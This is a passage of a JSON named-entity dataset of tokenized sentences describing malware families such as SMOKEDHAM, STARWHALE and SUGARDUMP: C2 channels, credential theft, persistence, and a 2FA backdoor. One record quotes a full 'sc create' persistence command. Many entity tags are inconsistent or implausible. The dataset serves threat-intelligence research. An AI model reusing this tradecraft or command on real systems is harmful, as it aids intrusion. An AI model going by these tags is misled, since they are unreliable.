"web", "server", "and", "to", "insert", "logic", "that", "will", "read", "or", "write", "files", "or", "execute", "commands", "in", "response", "to", "HTTP", "POST", "requests." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLIGHTPULSE", "is", "a", "web", "shell", "that", "can", "read,", "write,", "and", "execute", "files", "on", "compromised", "servers." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Features", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "SLOTHFULMEDIA", "has", "hashed", "a", "string", "containing", "system", "information", "prior", "to", "exfiltration", "via", "POST", "requests." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLOTHFULMEDIA", "has", "uploaded", "files", "and", "information", "from", "victim", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLOTHFULMEDIA", "has", "sent", "system", "information", "to", "a", "C2", "server", "via", "HTTP", "and", "HTTPS", "POST", "requests." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLOTHFULMEDIA", "has", "deleted", "itself", "and", "the", "'index.dat'", "file", "on", "a", "compromised", "machine", "to", "remove", "recent", "Internet", "history", "from", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLOTHFULMEDIA", "can", "enumerate", "files", "and", "directories." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLOTHFULMEDIA", "has", "been", "created", "with", "a", "hidden", "attribute", "to", "insure", "it's", "not", "visible", "to", "the", "victim." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLOTHFULMEDIA", "has", "downloaded", "files", "onto", "a", "victim", "machine." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-OffAct", "O", "O", "O", "O" ] }, { "tokens": [ "SLOTHFULMEDIA", "has", "a", "keylogging", "capability." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "SLOTHFULMEDIA", "has", "named", "a", "service", "it", "establishes", "on", "victim", "machines", "as", "\"TaskFrame\"", "to", "hide", "its", "malicious", "purpose." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLOTHFULMEDIA", "has", "mimicked", "the", "names", "of", "known", "executables,", "such", "as", "mediaplayer.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "SLOTHFULMEDIA", "can", "add,", "modify,", "and/or", "delete", "registry", "keys.", "It", "has", "changed", "the", "proxy", "configuration", "of", "a", "victim", "system", "by", "modifying", "the", "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet", "Settings\\ZoneMap</code>", "registry." ], "ner_tags": [ "B-Idus", "O", "B-Features", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "SLOTHFULMEDIA", "has", "enumerated", "processes", "by", "ID,", "name,", "or", "privileges." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLOTHFULMEDIA", "can", "inject", "into", "running", "processes", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLOTHFULMEDIA", "has", "taken", "a", "screenshot", "of", "a", "victim's", "desktop,", "named", "it", "\"Filter3.jpg\",", "and", "stored", "it", "in", "the", "local", "directory." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLOTHFULMEDIA", "has", "the", "capability", "to", "start", "services." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLOTHFULMEDIA", "has", "the", "capability", "to", "stop", "processes", "and", "services." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "SLOTHFULMEDIA", "has", "collected", "system", "name,", "OS", "version,", "adapter", "information,", "memory", "usage,", "and", "disk", "information", "from", "a", "victim", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLOTHFULMEDIA", "can", "enumerate", "open", "ports", "on", "a", "victim", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLOTHFULMEDIA", "has", "collected", "the", "username", "from", "a", "victim", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLOTHFULMEDIA", "has", "the", "capability", "to", "enumerate", "services." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-SamFile", "B-Purp" ] }, { "tokens": [ "SLOTHFULMEDIA", "has", "used", "HTTP", "and", "HTTPS", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "SLOTHFULMEDIA", "can", "open", "a", "command", "line", "to", "execute", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLOTHFULMEDIA", "has", "created", "a", "service", "on", "victim", "machines", "named", "\"TaskFrame\"", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "SLOWDRIFT", "uses", "cloud", "based", "services", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "SLOWDRIFT", "downloads", "additional", "payloads." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "SLOWDRIFT", "collects", "and", "sends", "system", "information", "to", "its", "C2." ], "ner_tags": [ "B-Way", "B-Features", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "SLOWPULSE", "is", "applied", "in", "compromised", "environments", "through", "modifications", "to", "legitimate", "Pulse", "Secure", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "SLOWPULSE", "can", "write", "logged", "ACE", "credentials", "to", "`/home/perl/PAUS.pm`", "in", "append", "mode,", "using", "the", "format", "string", "`%s:%s\\n`." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "SLOWPULSE", "can", "insert", "malicious", "logic", "to", "bypass", "RADIUS", "and", "ACE", "two", "factor", "authentication", "(2FA)", "flows", "if", "a", "designated", "attacker-supplied", "password", "is", "provided." ], "ner_tags": [ "B-Idus", "O", "I-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLOWPULSE", "can", "log", "credentials", "on", "compromised", "Pulse", "Secure", "VPNs", "during", "the", "`DSAuth::AceAuthServer::checkUsernamePassword`ACE-2FA", "authentication", "procedure." ], "ner_tags": [ "B-Idus", "O", "B-Features", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLOWPULSE", "can", "modify", "LDAP", "and", "two", "factor", "authentication", "flows", "by", "inspecting", "login", "credentials", "and", "forcing", "successful", "authentication", "if", "the", "provided", "password", "matches", "a", "chosen", "backdoor", "password." ], "ner_tags": [ "B-Idus", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLOWPULSE", "can", "hide", "malicious", "code", "in", "the", "padding", "regions", "between", "legitimate", "functions", "in", "the", "Pulse", "Secure", "`libdsplibs.so`", "file." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SMOKEDHAM", "has", "added", "user", "accounts", "to", "local", "Admin", "groups." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "B-Org", "O" ] }, { "tokens": [ "SMOKEDHAM", "has", "used", "a", "fronted", "domain", "to", "obfuscate", "its", "hard-coded", "C2", "server", "domain." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "SMOKEDHAM", "source", "code", "is", "embedded", "in", "the", "dropper", "as", "an", "encrypted", "string." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "SMOKEDHAM", "has", "exfiltrated", "data", "to", "its", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SMOKEDHAM", "has", "modified", "the", "Registry", "to", "hide", "created", "user", "accounts", "from", "the", "Windows", "logon", "screen." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SMOKEDHAM", "has", "used", "Powershell", "to", "download", "UltraVNC", "and", "ngrok", "from", "third-party", "file", "sharing", "sites." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SMOKEDHAM", "can", "continuously", "capture", "keystrokes." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "SMOKEDHAM", "has", "used", "<code>net.exe", "user</code>", "and", "<code>net.exe", "users</code>", "to", "enumerate", "local", "accounts", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SMOKEDHAM", "has", "created", "user", "accounts." ], "ner_tags": [ "B-Idus", "O", "B-OffAct", "B-Purp", "B-Tool" ] }, { "tokens": [ "SMOKEDHAM", "has", "relied", "upon", "users", "clicking", "on", "a", "malicious", "link", "delivered", "through", "phishing." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "SMOKEDHAM", "has", "modified", "registry", "keys", "for", "persistence,", "to", "enable", "credential", "caching", "for", "credential", "access,", "and", "to", "facilitate", "lateral", "movement", "via", "RDP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "SMOKEDHAM", "can", "execute", "Powershell", "commands", "sent", "from", "its", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SMOKEDHAM", "has", "used", "<code>reg.exe</code>", "to", "create", "a", "Registry", "Run", "key." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SMOKEDHAM", "can", "capture", "screenshots", "of", "the", "victim’s", "desktop." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "SMOKEDHAM", "has", "been", "delivered", "via", "malicious", "links", "in", "phishing", "emails." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "SMOKEDHAM", "has", "encoded", "its", "C2", "traffic", "with", "Base64." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SMOKEDHAM", "has", "encrypted", "its", "C2", "traffic", "with", "RC4." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SMOKEDHAM", "has", "used", "the", "<code>systeminfo</code>", "command", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SMOKEDHAM", "has", "used", "<code>whoami</code>", "commands", "to", "identify", "system", "owners." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SMOKEDHAM", "has", "communicated", "with", "its", "C2", "servers", "via", "HTTPS", "and", "HTTP", "POST", "requests." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "SMOKEDHAM", "has", "used", "Google", "Drive", "and", "Dropbox", "to", "host", "files", "downloaded", "by", "victims", "via", "malicious", "links." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SNUGRIDE", "establishes", "persistence", "through", "a", "Registry", "Run", "key." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SNUGRIDE", "encrypts", "C2", "traffic", "using", "AES", "with", "a", "static", "key." ], "ner_tags": [ "B-Way", "B-Features", "B-HackOrg", "B-Features", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "SNUGRIDE", "communicates", "with", "its", "C2", "server", "over", "HTTP." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-HackOrg", "O", "O", "B-Way" ] }, { "tokens": [ "SNUGRIDE", "is", "capable", "of", "executing", "commands", "and", "spawning", "a", "reverse", "shell." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Features", "I-Features", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "SOUNDBITE", "is", "capable", "of", "enumerating", "application", "windows." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "SOUNDBITE", "communicates", "via", "DNS", "for", "C2." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "SOUNDBITE", "is", "capable", "of", "enumerating", "and", "manipulating", "files", "and", "directories." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "I-Features", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "SOUNDBITE", "is", "capable", "of", "modifying", "the", "Registry." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "SOUNDBITE", "is", "capable", "of", "gathering", "system", "information." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Data", "SPACESHIP", "copies", "to", "the", "staging", "area", "is", "compressed", "with", "zlib.", "Bytes", "are", "rotated", "by", "four", "positions", "and", "XOR'ed", "with", "0x23." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SPACESHIP", "copies", "staged", "data", "to", "removable", "drives", "when", "they", "are", "inserted", "into", "the", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SPACESHIP", "identifies", "files", "and", "directories", "for", "collection", "by", "searching", "for", "specific", "file", "extensions", "or", "file", "modification", "time." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SPACESHIP", "identifies", "files", "with", "certain", "extensions", "and", "copies", "them", "to", "a", "directory", "in", "the", "user's", "profile." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SPACESHIP", "achieves", "persistence", "by", "creating", "a", "shortcut", "in", "the", "current", "user's", "Startup", "folder." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SPACESHIP", "achieves", "persistence", "by", "creating", "a", "shortcut", "in", "the", "current", "user's", "Startup", "folder." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SQLRat", "has", "used", "a", "character", "insertion", "obfuscation", "technique,", "making", "the", "script", "appear", "to", "contain", "Chinese", "characters." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SQLRat", "has", "scripts", "that", "are", "responsible", "for", "deobfuscating", "additional", "scripts." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "SQLRat", "has", "used", "been", "observed", "deleting", "scripts", "once", "used." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "I-Features", "O", "O" ] }, { "tokens": [ "SQLRat", "can", "make", "a", "direct", "SQL", "connection", "to", "a", "Microsoft", "database", "controlled", "by", "the", "attackers,", "retrieve", "an", "item", "from", "the", "bindata", "table,", "then", "write", "and", "execute", "the", "file", "on", "disk." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SQLRat", "relies", "on", "users", "clicking", "on", "an", "embedded", "image", "to", "execute", "the", "scripts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SQLRat", "has", "used", "PowerShell", "to", "create", "a", "Meterpreter", "session." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SQLRat", "has", "created", "scheduled", "tasks", "in", "<code>%appdata%\\Roaming\\Microsoft\\Templates\\</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SQLRat", "has", "used", "SQL", "to", "execute", "JavaScript", "and", "VB", "scripts", "on", "the", "host", "system." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "STARWHALE", "can", "collect", "data", "from", "an", "infected", "local", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "STARWHALE", "has", "been", "obfuscated", "with", "hex-encoded", "strings." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "STARWHALE", "can", "exfiltrate", "collected", "data", "to", "its", "C2", "servers." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "STARWHALE", "has", "stored", "collected", "data", "in", "a", "file", "called", "`stari.txt`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "STARWHALE", "has", "relied", "on", "victims", "opening", "a", "malicious", "Excel", "file", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "STARWHALE", "can", "establish", "persistence", "by", "installing", "itself", "in", "the", "startup", "folder,", "whereas", "the", "GO", "variant", "has", "created", "a", "`HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookM`", "registry", "key." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "STARWHALE", "has", "the", "ability", "to", "hex-encode", "collected", "data", "from", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "STARWHALE", "can", "gather", "the", "computer", "name", "of", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "STARWHALE", "has", "the", "ability", "to", "collect", "the", "IP", "address", "of", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "STARWHALE", "can", "gather", "the", "username", "from", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "STARWHALE", "can", "use", "the", "VBScript", "function", "`GetRef`", "as", "part", "of", "its", "persistence", "mechanism." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "STARWHALE", "has", "the", "ability", "to", "contact", "actor-controlled", "C2", "servers", "via", "HTTP." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "B-Way" ] }, { "tokens": [ "STARWHALE", "has", "the", "ability", "to", "execute", "commands", "via", "`cmd.exe`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "STARWHALE", "has", "the", "ability", "to", "create", "the", "following", "Windows", "service", "to", "establish", "persistence", "on", "an", "infected", "host:", "`sc", "create", "Windowscarpstss", "binpath=", "\"cmd.exe", "/c", "cscript.exe", "c:\\\\windows\\\\system32\\\\w7_1.wsf", "humpback_whale\"", "start=", "\"auto\"", "obj=", "\"LocalSystem\"`." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "STEADYPULSE", "can", "URL", "decode", "key/value", "pairs", "sent", "over", "C2." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "STEADYPULSE", "can", "add", "lines", "to", "a", "Perl", "script", "on", "a", "targeted", "server", "to", "import", "additional", "Perl", "modules." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "STEADYPULSE", "can", "transmit", "URL", "encoded", "data", "over", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "STEADYPULSE", "can", "parse", "web", "requests", "made", "to", "a", "targeted", "server", "to", "determine", "the", "next", "stage", "of", "execution." ], "ner_tags": [ "B-Idus", "O", "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "STEADYPULSE", "is", "a", "web", "shell", "that", "can", "enable", "the", "execution", "of", "arbitrary", "commands", "on", "compromised", "web", "servers." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SUGARDUMP", "has", "encrypted", "collected", "data", "using", "AES", "CBC", "mode", "and", "encoded", "it", "using", "Base64." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "SUGARDUMP", "has", "collected", "browser", "bookmark", "and", "history", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUGARDUMP", "variants", "have", "harvested", "credentials", "from", "browsers", "such", "as", "Firefox,", "Chrome,", "Opera,", "and", "Edge." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Tool", "O", "B-Tool" ] }, { "tokens": [ "SUGARDUMP", "has", "sent", "stolen", "credentials", "and", "other", "data", "to", "its", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUGARDUMP", "can", "search", "for", "and", "collect", "data", "from", "specific", "Chrome,", "Opera,", "Microsoft", "Edge,", "and", "Firefox", "files,", "including", "any", "folders", "that", "have", "the", "string", "`Profile`", "in", "its", "name." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUGARDUMP", "has", "stored", "collected", "data", "under", "`%<malware_execution_folder>%\\\\CrashLog.txt`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "A", "SUGARDUMP", "variant", "used", "SMTP", "for", "C2." ], "ner_tags": [ "O", "B-Way", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Some", "SUGARDUMP", "variants", "required", "a", "user", "to", "enable", "a", "macro", "within", "a", "malicious", ".xls", "file", "for", "execution." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUGARDUMP's", "scheduled", "task", "has", "been", "named", "`MicrosoftInternetExplorerCrashRepoeterTaskMachineUA`", "or", "`MicrosoftEdgeCrashRepoeterTaskMachineUA`,", "depending", "on", "the", "Windows", "OS", "version." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUGARDUMP", "has", "been", "named", "`CrashReporter.exe`", "to", "appear", "as", "a", "legitimate", "Mozilla", "executable." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUGARDUMP", "has", "created", "scheduled", "tasks", "called", "`MicrosoftInternetExplorerCrashRepoeterTaskMachineUA`", "and", "`MicrosoftEdgeCrashRepoeterTaskMachineUA`,", "which", "were", "configured", "to", "execute", "`CrashReporter.exe`", "during", "user", "logon." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "SUGARDUMP", "can", "identify", "Chrome,", "Opera,", "Edge", "Chromium,", "and", "Firefox", "browsers,", "including", "version", "number,", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "I-Tool", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "SUGARDUMP", "variant", "has", "used", "HTTP", "for", "C2." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "SUGARUSH", "has", "checked", "for", "internet", "connectivity", "from", "an", "infected", "host", "before", "attempting", "to", "establish", "a", "new", "TCP", "connection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUGARUSH", "has", "used", "TCP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "SUGARUSH", "has", "used", "port", "4585", "for", "a", "TCP", "connection", "to", "its", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUGARUSH", "has", "used", "`cmd`", "for", "execution", "on", "an", "infected", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUGARUSH", "has", "created", "a", "service", "named", "`Service1`", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "SUNBURST", "also", "removed", "the", "firewall", "rules", "it", "created", "during", "execution." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNBURST", "removed", "IFEO", "registry", "values", "to", "clean", "up", "traces", "of", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNBURST", "was", "digitally", "signed", "by", "SolarWinds", "from", "March", "-", "May", "2020." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Time", "O", "I-Time", "O" ] }, { "tokens": [ "SUNBURST", "used", "DNS", "for", "C2", "traffic", "designed", "to", "mimic", "normal", 